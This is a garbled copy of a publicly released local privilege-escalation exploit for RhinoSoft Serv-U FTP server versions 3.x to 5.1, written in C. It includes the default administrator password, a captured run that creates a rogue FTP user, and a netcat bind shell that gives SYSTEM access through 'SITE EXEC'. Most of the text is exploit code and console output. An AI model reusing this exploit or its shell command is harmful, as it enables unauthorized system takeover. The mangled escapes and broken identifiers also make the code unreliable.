RhinoSoft Serv-U 5.1.0.0.0.0.0.0.9
RhinoSoft Serv-U 5.0.0.4
RhinoSoft Serv-U 5.0
RhinoSoft Serv-U 4.1.0.3
RhinoSoft Serv-U 4.0.0.0.4
RhinoSoft Serv-U 4.0.0.0
RhinoSoft Serv-U 3.0.0.20
test program
/ ** Hax0rcitos proudly presents * Serv-u Local Exploit> v3.x. (Tested also against last version 5.1.0.0) ** All Serv-U versions have a default login/password for local administration. * This account can only connect on the loopback interface, so a * local user will be able to connect to Serv-U with this account and create * an FTP user with execute rights. After the user is created, just connect * to the FTP server and execute a raw "SITE EXEC" command. The program will * be executed with SYSTEM privileges. ** Copyright (c) 2003-2004 Haxorcitos.com. All Rights Reserved. ** THIS PROGRAM IS FOR EDUCATIONAL PURPOSES * ONLY * IT IS PROVIDED "AS IS" * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED *** Date: 10/2003 * Author: Andrés Tarascó Acunha ** Greetings to: #haxorcitos - #localhost and # ! dsr blackxors =) ** TESTED AGAINST SERV-U 4.x and v5.1.0.0 g: / expedition / serv-u / local> Whoami insane / at4r G: / Exploit / Serv-U / Local> Servulocal.exe "nc -l -p 99 -e cmd.exe" Serv-U> 3.x local Exploit by Haxorcitos <220 Serv-U ftp server v5.0 for Winsock Ready ...> User Localadministrator <331 User Name Okay, Need Password. ********************************************* *******************> Pass #l@ or $ak#.lk; 0 @ P <230 user logged in, proceed. ******** ***********************************> Site maintenance * *********************************************************** *** [ ] Creating New Domain ... <200-domainid =
3 220 Domain Settings Saved **************************************************** ********* [ ] Domain Haxorcitos: 3 created [ ] setting new domain online <220 server command ok ***************************** ******************************************* [ ] Creating Evil User <200-user = JMGS 200 User Settings Saved * *********************************************************** *** [ ] Now Exploiting ...> User JMGS <331 user name okay, need password. ******************************************* ***************************> Pass 111111 <230 user logged in, proceed. ************ ***************************************** [ ] now Executing: NC - L -P 99-E cmd.exe <220 domain deleted ********************************************* ***************** G: / EXPLOIT / Serv-U / Local> NC Localhost 99 Microsoft Windows XP [Versión 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C: /> JMGS JMGS NT A Uthority / system c: /> * / # include
#de #l@ / @ @ @ $ @ $ @P / r / n "#define maintenance" site maintenance / r / n "#define exit" quit / r / n "char newdomain [] =" SetDomain / r / n "" -domain = jmgs | 0.0.0.0 | 2121 | -1 | 1 | 0 / r / n "" -tzoenable = 0 / r / n "" TZoKey = / r / n "; / * "-Dyndnsenable = 0 / r / n" "DynipName = / r / n"; * / char Deldomain [] = "- deleteDomain / r / n" "-ip = 0.0.0.0 / r / n" "portno = 2121 / r / n "; char newuser [] =" -setUsetup / r / n "" -ip = 0.0.0 / r / n "" -portno = 2121 / r / n "" -user = jmgs / r / n "" -Password = 111111 / r / n "" -homedir = c: /// r / n "" -loginmesfile = / r / n "" -disable = 0 / r / n "" -relpaths = 1 / r / n "" -needsecure = 0 / r / n "" -hidehidden = 0 / r / n "" -Alwaysallowlogin = 0 / r / n "" -changepassword = 0 / r / n "" -quotaenable = 0 / r / N "" -Maxusersloginperip = -1 / r / n "" -speedlimitup = 0 / r / n "" -speedlimitdown = 0 / r / n "" -maxnrusers = -1 / r / n "" -idletimeout = 600 / r / n "" -SessionTIMEOUT = -1 / r / n "" -expire = 0 / r / n "" -ratioup = 1 / r / n "" -ratiodown = 1 / r / n ""
-Ratioscredit = 0 / r / n "" -quotacurrent = 0 / r / n "" -quotamaximum = 0 / r / n "" -maintence = none / r / n "" -parswordtype = regular / r / n "" -Ratios = none / r / n "" Access = C: // | Relp / R / N "; #define localport 43958 # Define localip" 127.0.0.1 "Char Cadena [1024]; int REC, DOMAIN; / ** *********************************************************** *********************************** / VOID PARSECMMAVAnds (int SHOCK, CHAR * DATA, INT Showsend, int showResponses, char * response) {send (SEND) SOCK, DATA, STRLEN (DATA), 0); IF (Showsend) Printf (">% S", DATA); SLEEP (100); do {REC = Recv (Sock, Cadena, Sizeof (Cadena), 0) Cadena [REC] = '/ 0'; if (Rec <= 0) Return; IF (ShowResponses) Printf ("<% S", CADENA); IF (Strncmp (Cadena, DomainID, Strlen (DomainID) == 0 ) Domain = ATOI (Cadena Strlen); //} while (Strncmp (Cadena, Response, Strlen (Response))! = 0);} while (strstr (cadena, response) == null); printf "******************************************************** ***** / r / N ");} / ************************************************** ********************************************* / INT MAIN (int Argc, char * argv []) {WSADATA WS; int SOCK, SOCK2; STRUCT SOCKADDR_IN JMGS; STRUCKADDR_IN XPL; PrintF ("Serv-U> 3.x LOCAL EXPLOIT BY JMGS / R / N / R / N"); IF (Argc <2) {Printf (" USAGE: Servulocal.exe / "Comming /" / R / N "); Printf (" EXAMPLE: Servulocal.exe / "nc.exe -l -p 99-E cmd.exe / "); Return (0); } IF (WSAStartup (MakeWord (2, 2), & WS)! = 0) {Printf ("
[-] WSAStartup () error / n "); exit (0);} Haxorcitos.sin_Family = AF_INET; HAXORCITOS.SIN_PORT = HTONS (localport); Haxorcitos.sin_addr.s_addr = inet_addr (localip); SOCK = Socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); Connect (Sock, (Struct SockAddr *) & JMGS, SIZEOF (JMGS)); REC = Recv (Sock, Cadena, Sizeof (Cadena), 0); Cadena [REC] = '/ 0'; Printf "<% s", cadena; Parsecommands (Sock, User, 1, 1, Userok); ParseCommands (Sock, Password, 1, 1, Passok); ParseCommands (Sock, Maintenance, 1, 0, "230"); Printf ("[ ] Creating New Domain ... / R / N"); ParseCommands (Sock, Newdomain, 0, 1, Banner); Printf ("[ ] Domain Haxorcitos:% i created / n", Domain) ; / * Only for v5.x printf ("[ ] setting new domain online / r / n"); sprintf (cadena, "- servercommand / r / n-id =% I / R / NCommand = Domainonline / R / N ", Domain); ParseCommands (Sock, Cadena, 0, 1, Banner); * / Printf (" [ ] Creating Evil User / R / N "); ParseCommands (Sock, Newuser, 0, 1," 200 " Sleep (1 000); Printf ("[ ] now exploiting ... / r / n"); xpl.sin_family = AF_INET; xpl.sin_port = htons (2121); xpl.sin_addr.s_addr = inet_addr (localip); SOCK2 = Socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); Connect (Sock2, Struct SockAddr *) & XPL, SizeOf (XPL)); REC = Recv (Sock2, Cadena, Sizeof (Cadena), 0); Cadena [REC] = '/ 0' ParseCommands (SOCK2, XPLUSER, 1, 1, Userok); ParseCommands (SOCK2, XPLPassword, 1, 1, Passok); Printf ("[ ] Now Executing:% S / R / N", Argv [1]); Sprintf (Cadena, "Site EXEC% S / R / N", Argv [1]);